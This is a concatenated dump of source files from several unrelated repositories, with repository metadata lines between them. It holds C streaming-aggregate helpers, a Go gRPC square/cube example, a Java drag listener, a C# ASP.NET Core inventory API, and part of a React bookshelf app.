 * collected values as a raw byte string. */
struct running_array_aggr_str{
	gs_uint32_t num_list[4];
	gs_uint8_t n_num;
};

/* Start with an empty list. */
void running_array_aggr_lfta_LFTA_AGGR_INIT_(char* scratch) {
	struct running_array_aggr_str* aggr = (struct running_array_aggr_str*)scratch;
	aggr->n_num = 0;
}

/* Append one value.  FIX: the original wrote num_list[n_num++]
 * unconditionally, so a fifth update arriving before a flush would write
 * past the 4-slot buffer (and corrupt n_num itself).  Values beyond the
 * capacity are now dropped instead of overflowing. */
void running_array_aggr_lfta_LFTA_AGGR_UPDATE_(char* scratch, gs_uint32_t val) {
	struct running_array_aggr_str* aggr = (struct running_array_aggr_str*)scratch;
	if (aggr->n_num < sizeof(aggr->num_list)/sizeof(aggr->num_list[0]))
		aggr->num_list[aggr->n_num++] = val;
}

/* Request a flush exactly when the buffer is full. */
gs_retval_t running_array_aggr_lfta_LFTA_AGGR_FLUSHME_(char* scratch) {
	struct running_array_aggr_str* aggr = (struct running_array_aggr_str*)scratch;
	return (aggr->n_num == sizeof(aggr->num_list)/sizeof(aggr->num_list[0]));
}

/* Expose only the filled slots as an unowned byte string. */
void running_array_aggr_lfta_LFTA_AGGR_OUTPUT_(struct gs_string* res, char* scratch) {
	struct running_array_aggr_str* aggr = (struct running_array_aggr_str*)scratch;
	res->data = scratch;
	res->length = aggr->n_num * sizeof(gs_uint32_t);
	res->owner = NULL;
}

/* Nothing allocated, nothing to free. */
void running_array_aggr_lfta_LFTA_AGGR_DESTROY_(char* scratch) { }
/////////////////////////////////////////////////////////
// ==============================================================
// other rts functions.
// sum_int_in_list
// given e.g. '34|45|56' and sepchar '|', return 135.
// gracefully handle empty entries, e.g. '|8|' should return 8
/* Sum the unsigned decimal numbers in a separator-delimited list,
 * e.g. "34|45|56" with sepchar "|" yields 135.  Empty entries contribute 0
 * (so "|8|" yields 8), non-digit characters within an entry contribute a 0
 * digit, and an empty separator string yields 0. */
gs_int64_t sum_uint_in_list(struct gs_string *list, struct gs_string *sepchar){
	gs_int64_t total = 0;
	gs_int64_t cur = 0;
	gs_uint8_t sep;
	gs_uint8_t ch;
	int idx;

	if(sepchar->length < 1)
		return 0;
	sep = sepchar->data[0];

	for(idx = 0; idx < list->length; ++idx){
		ch = list->data[idx];
		if(ch == sep){
			/* entry boundary: bank the current value */
			total += cur;
			cur = 0;
		}else{
			/* accumulate decimal digits; anything else counts as 0 */
			cur = 10*cur + (ch>='0' && ch<='9')*(ch-'0');
		}
	}
	/* the final entry has no trailing separator */
	return total + cur;
}
// Convert an string to an integer
/* Parse a gs_string as a signed decimal integer.  A leading '-' negates the
 * result; every other non-digit character contributes a 0 digit (the value
 * is still multiplied by 10, matching the behavior of sum_uint_in_list).
 * An empty string yields 0. */
gs_int64_t to_llong(struct gs_string *v){
	gs_int64_t mag = 0;
	gs_int64_t sign = 1;
	gs_uint8_t d;
	int idx;

	if(v->length < 1)
		return 0;

	d = v->data[0];
	if(d == '-')
		sign = -1;
	else
		mag = (d>='0' && d<='9')*(d-'0');

	for(idx = 1; idx < v->length; ++idx){
		d = v->data[idx];
		mag = 10*mag + (d>='0' && d<='9')*(d-'0');
	}
	return sign*mag;
}
| dae5393db795e07ead94fe61fec689415e0dc857 | [
"reStructuredText",
"Markdown",
"Makefile",
"INI",
"Python",
"Text",
"C",
"C++",
"Shell"
] | 45 | Text | o-ran-sc/com-gs-lite | 2bc6bde491e4ae54fb54302c052f23a98482eb92 | 11eb73db423d4644ffb8d6f99b00bf1326ba02dc |
refs/heads/master | <file_sep>package main
import (
"fmt"
"log"
"net"
pb "github.com/n704/go_grpc_eg"
"golang.org/x/net/context"
"google.golang.org/grpc"
"google.golang.org/grpc/reflection"
)
// port is the TCP address the gRPC server listens on.
const (
	port = ":50051"
)

// server implements the Greeter gRPC service; it is registered below via
// pb.RegisterGreeterServer.  (The original note referenced
// helloworld.GreeterServer -- presumably this service was adapted from the
// gRPC helloworld example.)
type server struct{}
// CalculateSquare is the Greeter RPC returning in.Value squared; the result
// is also logged to stdout.
func (s *server) CalculateSquare(ctx context.Context, in *pb.Int64) (*pb.Int64, error) {
	squared := in.Value * in.Value
	fmt.Printf("Square of %d is %d\n", in.Value, squared)
	return &pb.Int64{Value: squared}, nil
}
// CalculateCube is the Greeter RPC returning in.Value cubed; the result is
// also logged to stdout.
func (s *server) CalculateCube(ctx context.Context, in *pb.Int64) (*pb.Int64, error) {
	cubed := in.Value * in.Value * in.Value
	fmt.Printf("Cube of %d: %d\n", in.Value, cubed)
	return &pb.Int64{Value: cubed}, nil
}
// main boots the gRPC server: it opens a TCP listener on the configured
// port, registers the Greeter service implementation plus the reflection
// service, and serves until an unrecoverable error occurs.
func main() {
	lis, err := net.Listen("tcp", port)
	if err != nil {
		log.Fatalf("failed to listen: %v", err)
	}
	s := grpc.NewServer()
	pb.RegisterGreeterServer(s, &server{})
	// Register reflection service on gRPC server (lets tools such as
	// grpcurl discover the service at runtime).
	reflection.Register(s)
	// Serve blocks; it only returns on failure.
	if err := s.Serve(lis); err != nil {
		log.Fatalf("failed to serve: %v", err)
	}
}
<file_sep># GO gRPC Example Square
This example is built as a simple command-line tool.
# Installation
Installation of all dependencies is managed by the `dep` package manager:
```shell
go get -u github.com/golang/dep/cmd/dep
dep ensure
```
# Working
This example uses server–client communication over `tcp`.
The client invokes the server's services to get results.
In this example the server provides 2 functions:
* Square
- Return square of number
- default number is 1
* Cube
- Return cube of number
- default number is 1
```shell
go run client/main.go -square 122 -cube 9
2018/04/26 15:10:54 Square of 122: 14884
2018/04/26 15:10:54 Cube of 9: 729
```
# Running
For this to work, first run the `server`, then run the `client`.
## Server
```shell
go run server/main.go
```
## Client
```shell
go run client/main.go
```
<file_sep>package main
import (
"flag"
"log"
"time"
pb "github.com/n704/go_grpc_eg"
"golang.org/x/net/context"
"google.golang.org/grpc"
)
const (
	// address of the gRPC server to dial.
	address     = "localhost:50051"
	// defaultName mirrors the default flag value of 1.
	// NOTE(review): this constant appears unused below -- the flag
	// definitions use the literal 1 -- confirm before removing.
	defaultName = 1
)
// main parses the -square/-cube flags, dials the gRPC server, invokes both
// RPCs under a shared one-second deadline, and logs the results.
func main() {
	// Parse command-line input before doing any network work so that flag
	// errors (or -h) do not require a reachable server.  The original
	// parsed flags only after dialing.
	square := flag.Int64("square", 1, "find square of number")
	cube := flag.Int64("cube", 1, "find cube of number")
	flag.Parse()

	// Set up a connection to the server.
	conn, err := grpc.Dial(address, grpc.WithInsecure())
	if err != nil {
		log.Fatalf("did not connect: %v", err)
	}
	defer conn.Close()
	c := pb.NewGreeterClient(conn)

	// Contact the server and print out its response.  Both RPCs share a
	// single one-second deadline.
	ctx, cancel := context.WithTimeout(context.Background(), time.Second)
	defer cancel()

	r, err := c.CalculateSquare(ctx, &pb.Int64{Value: *square})
	if err != nil {
		// FIX: the original logged "could not greet" (copy-pasted from the
		// helloworld example), which misdescribes this RPC.
		log.Fatalf("could not calculate square: %v", err)
	}
	log.Printf("Square of %d: %d\n", *square, r.Value)

	r, err = c.CalculateCube(ctx, &pb.Int64{Value: *cube})
	if err != nil {
		log.Fatalf("could not calculate cube: %v", err)
	}
	log.Printf("Cube of %d: %d\n", *cube, r.Value)
}
| e5217292d585bbf45df0f238d9ae533eb99b3509 | [
"Markdown",
"Go"
] | 3 | Go | n704/go_grpc_eg | ec34d1fe345cc01e0a7be3aac2c22b224524b6a6 | 60b3dd8a9548abd3e1972d84c648a91e187d625e |
refs/heads/master | <repo_name>chinglimchan/DragAndDrop<file_sep>/app/src/main/java/com/chenql/draganddrop/helper/OnStartDragListener.java
package com.chenql.draganddrop.helper;
import android.support.v7.widget.RecyclerView;
/**
 * OnStartDragListener
 *
 * Callback through which a RecyclerView item can request that its host
 * start a drag operation for it.
 *
 * Created by chenqinglin777 on 7/4/2017.
 */
public interface OnStartDragListener {

    /**
     * Called when a view is requesting the start of a drag.
     *
     * @param viewHolder the holder of the view that should be dragged
     */
    void onStartDrag(RecyclerView.ViewHolder viewHolder);
}
| e3c439f724440177ff967f704b8baf7c4bfd3fad | [
"Java"
] | 1 | Java | chinglimchan/DragAndDrop | 1bf421d65a1cdf5b159a7cf63ba1e4b0c966c534 | 781616649c38cfe6ea9abf1f2de3cca795a469ff |
refs/heads/master | <file_sep>using System;
using System.Collections.Generic;
using System.Text;
using Newtonsoft.Json;
namespace Common.Helpers.CustomMVCBinders
{
/// <inheritdoc />
/// <summary>
/// The purpose of this class is to TRIM all the JSON string inputs which come from body.
/// </summary>
public class JsonTrimStringConverter : JsonConverter
{
public override bool CanConvert(Type objectType)
{
return objectType == typeof(string);
}
public override bool CanRead => true;
public override bool CanWrite => false; // only used for reading inputs
public override object ReadJson(JsonReader reader, Type objectType, object existingValue, JsonSerializer serializer)
{
var text = (string)reader.Value;
return text?.Trim();
}
public override void WriteJson(JsonWriter writer, object value, JsonSerializer serializer)
{
throw new Exception("Not configured for writing");
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Reflection;
using System.Text;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;
namespace Common.Helpers.CustomMVCBinders
{
/// <inheritdoc />
/// <summary>
/// Courtesy https://stackoverflow.com/questions/23830206/json-convert-empty-string-instead-of-null
/// </summary>
public sealed class SubstituteNullWithEmptyStringContractResolver : CamelCasePropertyNamesContractResolver
{
protected override JsonProperty CreateProperty(MemberInfo member, MemberSerialization memberSerialization)
{
var property = base.CreateProperty(member, memberSerialization);
if (property.PropertyType == typeof(string))
{
// Wrap value provider supplied by Json.NET.
property.ValueProvider = new NullToEmptyStringValueProvider(property.ValueProvider);
}
return property;
}
sealed class NullToEmptyStringValueProvider : IValueProvider
{
private readonly IValueProvider _provider;
public NullToEmptyStringValueProvider(IValueProvider provider)
{
_provider = provider ?? throw new ArgumentNullException(nameof(provider));
}
public object GetValue(object target)
{
return _provider.GetValue(target) ?? "";
}
public void SetValue(object target, object value)
{
_provider.SetValue(target, value);
}
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Api.Models;
namespace Api.Repositories
{
/// <summary>
/// Repository contract for <see cref="Inventory"/> entities; no members beyond
/// the generic CRUD surface of <see cref="IRepository{TEntity}"/> yet.
/// </summary>
public interface IInventoriesRepository : IRepository<Inventory>
{
}

/// <summary>
/// EF Core-backed inventory repository; all behaviour is inherited from
/// <see cref="BaseRepository{TEntity}"/>.
/// </summary>
public class InventoriesRepository : BaseRepository<Inventory>, IInventoriesRepository
{
    public InventoriesRepository(TernakLeleHmsContext context) : base(context)
    {
    }
}
}
<file_sep>using Common.Enums;
namespace Api.Models
{
/// <summary>
/// Inventory item (medication or supply) persisted via
/// <see cref="TernakLeleHmsContext"/>.
/// </summary>
public class Inventory
{
    public Inventory() {}

    // Primary key.
    public long InventoryId { get; set; }
    public string CrossReference { get; set; }
    public string Description { get; set; }
    public DistributionUnit DistributionUnit { get; set; }
    public InventoryType InventoryType { get; set; }
    public string Name { get; set; }
    public decimal Price { get; set; }
    public double Quantity { get; set; }
    public Rank Rank { get; set; }
    // Stock level at which the item should be reordered.
    public double ReorderPoint { get; set; }
}
<file_sep>using System;
using System.Collections.Generic;
using System.Text;
namespace Common.Dtos
{
/// <summary>
/// Wire-format projection of the Inventory entity.  The enum properties
/// (DistributionUnit, InventoryType, Rank) are flattened to their string names
/// by the AutoMapper DomainProfile.
/// </summary>
public class InventoryDto
{
    public long InventoryId { get; set; }
    public string CrossReference { get; set; }
    public string Description { get; set; }
    public string DistributionUnit { get; set; }
    public string InventoryType { get; set; }
    public string Name { get; set; }
    public decimal Price { get; set; }
    public double Quantity { get; set; }
    public string Rank { get; set; }
    public double ReorderPoint { get; set; }
}
}
<file_sep>namespace Common.Enums
{
/// <summary>Unit in which an inventory item is dispensed/distributed.</summary>
public enum DistributionUnit
{
    Ampoule,
    Bag,
    Bottle
}
}
<file_sep>namespace Common.Enums
{
/// <summary>Broad category of an inventory item.</summary>
public enum InventoryType
{
    Medication,
    Supply
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Api.Models;
using AutoMapper;
using Common.Dtos;
namespace Api.AutoMapper
{
/// <summary>
/// AutoMapper profile mapping Inventory -> InventoryDto; the enum properties
/// (DistributionUnit, InventoryType, Rank) are projected to their string names.
/// </summary>
public class DomainProfile : Profile
{
    public DomainProfile()
    {
        CreateMap<Inventory, InventoryDto>()
            .ForMember(dto => dto.DistributionUnit, opt => opt.MapFrom(s => s.DistributionUnit.ToString()))
            .ForMember(dto => dto.InventoryType, opt => opt.MapFrom(s => s.InventoryType.ToString()))
            .ForMember(dto => dto.Rank, opt => opt.MapFrom(s => s.Rank.ToString()));
    }
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Threading.Tasks;
using Microsoft.EntityFrameworkCore;
namespace Api.Repositories
{
/// <summary>
/// Generic EF Core repository base.  Stores the context as the non-generic
/// DbContext so one base class can serve multiple contexts; Include()/
/// IncludeChain() layer eager-loading onto the query root used by the read
/// methods.
/// </summary>
public abstract class BaseRepository<TEntity> : IRepository<TEntity>
    where TEntity : class
{
    protected DbContext Db; // use the generic dbcontext to support multiple contexts base repo.
    protected DbSet<TEntity> DbSet;
    protected IQueryable<TEntity> InternalQuery; // query root for reads; grows via Include()

    public BaseRepository(DbContext context)
    {
        Db = context;
        DbSet = Db.Set<TEntity>();
        InternalQuery = DbSet;
    }

    public virtual void Add(TEntity obj)
    {
        DbSet.Add(obj);
    }

    public virtual void AddRange(IEnumerable<TEntity> objList)
    {
        DbSet.AddRange(objList);
    }

    public virtual TEntity GetById(object id)
    {
        return DbSet.Find(id);
    }

    public virtual IEnumerable<TEntity> GetAll()
    {
        return InternalQuery.ToList();
    }

    public DbSet<TEntity> All => DbSet;

    /// <summary>
    /// Removes the entity with the given key.  FIX: the original called
    /// DbSet.Remove(DbSet.Find(id)) unconditionally, which throws when the key
    /// does not exist; an unknown id is now a no-op.
    /// </summary>
    public virtual void Remove(object id)
    {
        var entity = DbSet.Find(id);
        if (entity != null)
        {
            DbSet.Remove(entity);
        }
    }

    public void RemoveAll()
    {
        DbSet.RemoveRange(DbSet);
    }

    public void Remove(TEntity entity)
    {
        DbSet.Remove(entity);
    }

    // NOTE: unlike GetAll(), results here are detached (AsNoTracking).
    public IEnumerable<TEntity> Find(Expression<Func<TEntity, bool>> predicate)
    {
        return InternalQuery.AsNoTracking().Where(predicate);
    }

    public virtual async Task<TEntity> FindAsync(object id)
    {
        return await DbSet.FindAsync(id);
    }

    public virtual async Task<TEntity> GetByIdAsync(object id)
    {
        return await DbSet.FindAsync(id);
    }

    public virtual async Task<IEnumerable<TEntity>> GetAllAsync()
    {
        return await InternalQuery.ToListAsync();
    }

    public async Task<int> SaveChangesAsync()
    {
        return await Db.SaveChangesAsync();
    }

    public void Include<TProperty>(Expression<Func<TEntity, TProperty>> navigationPropertyPath)
    {
        InternalQuery = InternalQuery.Include(navigationPropertyPath);
    }

    public IRepository<TEntity> IncludeChain<TProperty>(Expression<Func<TEntity, TProperty>> navigationPropertyPath)
    {
        Include(navigationPropertyPath);
        return this;
    }

    public void UpdateOrAdd(TEntity updatedEntity, object entityId)
    {
        var entity = GetById(entityId);
        if (entity != null)
        {
            // Copy the updated scalar values onto the tracked instance.
            var attachedEntry = Db.Entry(entity);
            attachedEntry.CurrentValues.SetValues(updatedEntity);
        }
        else
        {
            DbSet.Add(updatedEntity);
        }
    }

    public void Dispose()
    {
        // NOTE(review): Db is registered with a scoped lifestyle in Startup, so the
        // container also disposes it - confirm this manual Dispose is intended.
        Db.Dispose();
        GC.SuppressFinalize(this);
    }
}
}
<file_sep>using Microsoft.EntityFrameworkCore;
namespace Api.Models
{
/// <summary>
/// EF Core database context for the Ternak Lele HMS API; currently exposes only
/// the Inventories set.
/// </summary>
public class TernakLeleHmsContext : DbContext
{
    // Options-based constructor used both by ASP.NET Core DI and by the
    // SimpleInjector registration in Startup.InitializeContainer.
    public TernakLeleHmsContext(DbContextOptions<TernakLeleHmsContext> options)
        : base(options) { }

    // Parameterless constructor (e.g. for tooling - confirm it is still needed).
    public TernakLeleHmsContext() : base() { }

    public DbSet<Inventory> Inventories { get; set; }
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Text;
namespace Common.Enums
{
/// <summary>
/// Inventory rank category (A, B or C); the business meaning of each letter is
/// not documented in this codebase.
/// </summary>
public enum Rank
{
    A,
    B,
    C
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Globalization;
using System.Linq;
using System.Threading.Tasks;
using Api.Models;
using Api.Repositories;
using Api.Services;
using AutoMapper;
using Common.Helpers.CustomMVCBinders;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;
using Microsoft.AspNetCore.Http;
using Microsoft.AspNetCore.HttpsPolicy;
using Microsoft.AspNetCore.Localization;
using Microsoft.AspNetCore.Mvc;
using Microsoft.AspNetCore.Mvc.Controllers;
using Microsoft.AspNetCore.Mvc.ViewComponents;
using Microsoft.EntityFrameworkCore;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Logging;
using Microsoft.Extensions.Options;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;
using SimpleInjector;
using SimpleInjector.Lifestyles;
using SimpleInjector.Integration.AspNetCore.Mvc;
namespace Api
{
// todo setup AutoMapper, then create DTO and ViewModel to test it.
// todo register IRepository, IInventoriesService, IInventoriesRepository to SimpleInjector
//      NOTE(review): InitializeContainer below already registers the Inventories
//      service/repository pair - confirm whether this todo is stale.
// todo configure Logger then apply it to TernakLeleHMSContext
/// <summary>
/// ASP.NET Core composition root.  Framework services (MVC, EF, localization)
/// go through the built-in container; application services and repositories
/// are resolved by SimpleInjector, cross-wired so both containers cooperate.
/// </summary>
public class Startup
{
    #region SimpleInjector
    // Application-level DI container; verified at the end of Configure().
    private readonly Container _container = new Container();
    #endregion

    public Startup(IConfiguration configuration)
    {
        Configuration = configuration;
    }

    public IConfiguration Configuration { get; }

    // This method gets called by the runtime. Use this method to add services to the container.
    public void ConfigureServices(IServiceCollection services)
    {
        // Pin the request culture to en-GB and disable per-request culture providers.
        services.Configure<RequestLocalizationOptions>(options =>
        {
            options.DefaultRequestCulture = new RequestCulture("en-GB");
            options.SupportedCultures = new List<CultureInfo> { new CultureInfo("en-GB") };
            options.RequestCultureProviders.Clear();
        });

        // Global Json.NET defaults: serialize null strings as "".
        JsonConvert.DefaultSettings = () => new JsonSerializerSettings
        {
            ContractResolver = new SubstituteNullWithEmptyStringContractResolver()
        };

        // Register DbContext to DI
        services.AddDbContext<TernakLeleHmsContext>(options => options.UseSqlServer(Configuration.GetConnectionString("TernakLeleHmsContext")));

        #region AutoMapper
        services.AddAutoMapper();
        #endregion

        // Every action produces application/json.
        services.AddMvc(options =>
        {
            options.Filters.Add(new ProducesAttribute("application/json"));
        })
            .SetCompatibilityVersion(CompatibilityVersion.Version_2_1)
            .AddJsonOptions(options =>
            {
                options.SerializerSettings.ContractResolver = new CamelCasePropertyNamesContractResolver();
                options.SerializerSettings.Converters.Insert(0, new JsonTrimStringConverter()); // global input trimming for JSON Body source
                options.SerializerSettings.DateTimeZoneHandling = DateTimeZoneHandling.Utc;
            });

        #region SimpleInjector
        IntegrateSimpleInjector(services);
        #endregion
    }

    // This method gets called by the runtime. Use this method to configure the HTTP request pipeline.
    // Configure is called after ConfigureServices is called.
    public void Configure(IApplicationBuilder app, IHostingEnvironment env)
    {
        #region SimpleInjector
        InitializeContainer(app);
        #endregion

        if (env.IsDevelopment())
        {
            app.UseDeveloperExceptionPage();
        }
        else
        {
            app.UseHsts();
        }

        app.UseHttpsRedirection();

        #region SimpleInjector
        // Fail fast on misconfigured registrations.
        _container.Verify();
        #endregion

        app.UseMvc();
    }

    #region SimpleInjector
    // Bridge ASP.NET Core's container with SimpleInjector (controller/view-component
    // activation plus cross-wiring and request scoping).
    private void IntegrateSimpleInjector(IServiceCollection services)
    {
        _container.Options.DefaultScopedLifestyle = new AsyncScopedLifestyle();

        services.AddSingleton<IHttpContextAccessor, HttpContextAccessor>();

        services.AddSingleton<IControllerActivator>(new SimpleInjectorControllerActivator(_container));
        services.AddSingleton<IViewComponentActivator>(new SimpleInjectorViewComponentActivator(_container));

        services.EnableSimpleInjectorCrossWiring(_container);
        services.UseSimpleInjectorAspNetRequestScoping(_container);
    }

    // All application-level registrations live here.
    private void InitializeContainer(IApplicationBuilder app)
    {
        // Add application presentation components:
        _container.RegisterMvcControllers(app);
        _container.RegisterMvcViewComponents(app);

        // DbContext
        var optionsBuilder = new DbContextOptionsBuilder<TernakLeleHmsContext>();
        optionsBuilder.UseSqlServer(Configuration.GetConnectionString("TernakLeleHmsContext"));
        _container.Register(() => new TernakLeleHmsContext(optionsBuilder.Options), Lifestyle.Scoped);

        // Services
        _container.Register<IInventoriesService, InventoriesService>(Lifestyle.Scoped);

        // Repositories
        _container.Register<IInventoriesRepository, InventoriesRepository>(Lifestyle.Scoped);

        // Allow Simple Injector to resolve services from ASP.NET Core.
        _container.AutoCrossWireAspNetComponents(app);
    }
    #endregion
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Data;
using System.Data.Common;
using System.Linq;
using System.Linq.Expressions;
using System.Threading.Tasks;
using Microsoft.EntityFrameworkCore;
namespace Api.Repositories
{
/// <summary>
/// Generic repository contract.  Disposable because implementations own (or at
/// least dispose) a DbContext - see BaseRepository.Dispose.
/// </summary>
public interface IRepository<TEntity> : IDisposable where TEntity : class
{
    /// <summary>Stages a new entity for insertion.</summary>
    void Add(TEntity obj);

    /// <summary>Stages a batch of new entities for insertion.</summary>
    void AddRange(IEnumerable<TEntity> objList);

    /// <summary>
    /// Updates an EXISTING entity to the updated entity OR add them to the context
    /// </summary>
    /// <param name="updatedEntity"></param>
    /// <param name="entityId"></param>
    void UpdateOrAdd(TEntity updatedEntity, object entityId);

    /// <summary>
    /// Fetch an entity with all of its navigation properties. Could be overridden to ensure more efficient fetching (obey the Include laws, if necessary).
    /// </summary>
    /// <param name="id"></param>
    /// <returns></returns>
    TEntity GetById(object id);

    /// <summary>Materializes every entity reachable from the query root.</summary>
    IEnumerable<TEntity> GetAll();

    /// <summary>Raw DbSet escape hatch for ad-hoc queries.</summary>
    DbSet<TEntity> All { get; }

    /// <summary>Removes the entity with the given key.</summary>
    void Remove(object id);

    /// <summary>Removes every entity of this type.</summary>
    void RemoveAll();

    /// <summary>Removes the given (tracked) entity.</summary>
    void Remove(TEntity entity);

    /// <summary>Filters by predicate; implementations may return detached results.</summary>
    IEnumerable<TEntity> Find(Expression<Func<TEntity, bool>> predicate);

    /// <summary>
    /// Finds an entity inside the context store or fetch from DB asynchronously.
    /// Note that this WILL NOT obey the Include rules or fetch ANY Navigation props
    /// </summary>
    /// <param name="id"></param>
    /// <returns></returns>
    Task<TEntity> FindAsync(object id);

    /// <summary>
    /// Fetch an entity with all of its navigation properties asynchronously. Could be overridden to ensure more efficient fetching (obey the Include laws, if necessary).
    /// </summary>
    /// <param name="id"></param>
    /// <returns></returns>
    Task<TEntity> GetByIdAsync(object id);

    /// <summary>Async counterpart of <see cref="GetAll"/>.</summary>
    Task<IEnumerable<TEntity>> GetAllAsync();

    /// <summary>Flushes pending changes to the database.</summary>
    Task<int> SaveChangesAsync();

    /// <summary>Adds an eager-load path to subsequent reads.</summary>
    void Include<TProperty>(Expression<Func<TEntity, TProperty>> navigationPropertyPath);

    /// <summary>Fluent variant of <see cref="Include"/>; returns this repository.</summary>
    IRepository<TEntity> IncludeChain<TProperty>(Expression<Func<TEntity, TProperty>> navigationPropertyPath);
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Api.Models;
using Api.Repositories;
using Common.Dtos;
namespace Api.Services
{
/// <summary>Application service exposing inventory read operations.</summary>
public interface IInventoriesService
{
    Task<IEnumerable<InventoryDto>> GetInventories();
}

/// <summary>
/// Inventory service.  Currently returns hard-coded sample data; the injected
/// repository is not consulted yet (see the todos in Startup).
/// </summary>
public class InventoriesService : IInventoriesService
{
    private readonly IInventoriesRepository _inventoriesRepo;

    public InventoriesService(IInventoriesRepository inventoriesRepo)
    {
        _inventoriesRepo = inventoriesRepo;
    }

    public async Task<IEnumerable<InventoryDto>> GetInventories()
    {
        // Stubbed sample payload (identical records to before), returned through a
        // completed task instead of the ToAsyncEnumerable()/ToList() round trip.
        var first = new InventoryDto()
        {
            InventoryId = 1,
            CrossReference = "Test",
            DistributionUnit = "csdcsd",
            Description = "fwefwe",
            InventoryType = "csdcsd",
            Name = "cdscsdc",
            Price = new decimal(5.25),
            Quantity = 2,
            Rank = "C",
            ReorderPoint = 3
        };

        var second = new InventoryDto()
        {
            InventoryId = 2,
            CrossReference = "vdfvd",
            DistributionUnit = "vdfvdf",
            Description = "bdbd",
            InventoryType = "referf",
            Name = "vdfvf",
            Price = new decimal(7.34),
            Quantity = 6,
            Rank = "B",
            ReorderPoint = 11
        };

        return await Task.FromResult<IEnumerable<InventoryDto>>(new List<InventoryDto> { first, second });
    }
}
}
| ce2f9056dfef4d550023959147043ce6e7608892 | [
"C#"
] | 14 | C# | diazcempe/ternaklele-hms-api | dc7dc4466abea354deb1e7397f2f75568480be75 | 1dedfebf396839a5d8a7b5965d4b82504cbb84f4 |
refs/heads/master | <repo_name>gianlucabianco/reactnd-project-myreads-starter<file_sep>/src/components/BookCard.js
import React from 'react';
import PropTypes from 'prop-types';
import BookShelfChanger from './BookShelfChanger';
/**
 * A single book tile: cover (click opens the details modal), shelf-changer
 * drop-down, title and author list.
 *
 * Props: book (object), shelfName (string), onShelfChange (func),
 * showDetails (func).
 */
class BookCard extends React.Component {

    // Wrap the bare shelf value from BookShelfChanger into the
    // { newShelf, book: { id } } shape the app-level handler expects.
    onShelfChange = newShelf => {
        this.props.onShelfChange(
            {
                newShelf,
                book: {
                    id: this.props.book.id,
                },
            }
        );
    };

    showDetails = book => {
        this.props.showDetails( book );
    };

    render() {
        const {
            shelfName,
            book,
        } = this.props;

        // Note: book fields (imageLinks, title, authors) are guarded because the
        // search API can return partial records.
        return (
            <div className="book">
                <div className="book-top">
                    <div
                        className="book-cover"
                        style={
                            {
                                width: 128,
                                height: 193,
                                backgroundRepeat: 'no-repeat',
                                backgroundPosition: 'center',
                                backgroundSize: 'cover',
                                backgroundImage: `url("${ book && book.imageLinks && book.imageLinks.thumbnail }")`,
                            }
                        }
                        onClick={ () => this.showDetails( book ) }
                    />
                    <BookShelfChanger
                        shelfName={ shelfName }
                        onShelfChange={ this.onShelfChange }
                    />
                </div>
                <div className="book-title" >
                    {
                        book
                        && book.title
                    }
                </div>
                <div className="book-authors" >
                    {
                        book
                        && book.authors
                        && book.authors.map(
                            author => (
                                <div
                                    key={ author }
                                >{ author }</div>
                            )
                        )
                    }
                </div>
            </div>
        );
    };
};

BookCard.propTypes = {
    onShelfChange: PropTypes.func.isRequired,
    showDetails: PropTypes.func.isRequired,
    shelfName: PropTypes.string.isRequired,
    book: PropTypes.object.isRequired,
};
export default BookCard;<file_sep>/src/components/BookShelfChanger.js
import React from 'react';
import PropTypes from 'prop-types';
class BookShelfChanger extends React.Component {
handleChange = event => {
const newShelf = event.target.value;
newShelf !== 'none'
&& this.props.onShelfChange(
newShelf
);
};
render() {
const { shelfName } = this.props;
return (
<div className="book-shelf-changer">
<select
onChange={ this.handleChange }
defaultValue={ shelfName }
>
<option value="move" disabled>Move to...</option>
<option value="currentlyReading">Currently Reading</option>
<option value="wantToRead">Want to Read</option>
<option value="read">Read</option>
<option value="none">None</option>
</select>
</div>
);
};
};
BookShelfChanger.propTypes = {
onShelfChange: PropTypes.func.isRequired,
shelfName: PropTypes.string.isRequired,
};
export default BookShelfChanger;<file_sep>/src/App.js
import React from 'react';
import { Route } from 'react-router-dom';
import * as BooksAPI from './BooksAPI';
import './App.css';
import ListBooks from './components/ListBooks';
import SearchBooks from './components/SearchBooks';
import DetailsModal from './components/DetailsModal';
/**
 * Root component of the MyReads app.
 *
 * Owns all book state: the raw list from BooksAPI (`allBooks`), the three
 * derived shelves (`bookShelves`), and the detail-modal state.  Shelf changes
 * are persisted through the API and then trigger a full re-fetch so both
 * views stay in sync.
 */
class BooksApp extends React.Component {

    state = {
        bookShelves: [],
        allBooks: [],
        detailsModal: {
            isOpen: false,
            book: {},
        }
    };

    componentDidMount = () => {
        this.fetchBooks();
    }

    // Load every shelved book from the backend.
    fetchBooks = () => {
        BooksAPI.getAll()
            .then(
                books => {
                    this.setAllBooks( books )
                }
            );
    }

    // Store the raw list, then rebuild the derived shelves from it.
    setAllBooks = allBooks => {
        this.setState(
            {
                allBooks
            }
        )

        this.setShelves( allBooks );
    }

    // Partition books into the three fixed shelves by their `shelf` field.
    setShelves = books => {
        const bookShelves = [
            {
                title: 'Currently reading',
                books: [],
            },
            {
                title: 'Want to read',
                books: [],
            },
            {
                title: 'Read',
                books: [],
            },
        ];

        books.forEach(
            book => {
                if ( book.shelf ) {
                    book.shelf === 'currentlyReading'
                    && bookShelves[ 0 ].books.push( book );

                    book.shelf === 'wantToRead'
                    && bookShelves[ 1 ].books.push( book );

                    book.shelf === 'read'
                    && bookShelves[ 2 ].books.push( book );
                }
            }
        );

        this.setState(
            {
                bookShelves,
            }
        );
    }

    // Persist a shelf change ({ newShelf, book: { id } }) and re-fetch everything.
    onShelfChange = newShelfData => {
        BooksAPI.update(
            {
                id: newShelfData.book.id
            },
            newShelfData.newShelf
        ).then(
            () => this.fetchBooks()
        );
    }

    // Open the details modal for one book.
    showDetails = book => {
        this.setState(
            {
                detailsModal: {
                    isOpen: true,
                    book,
                }
            }
        );
    }

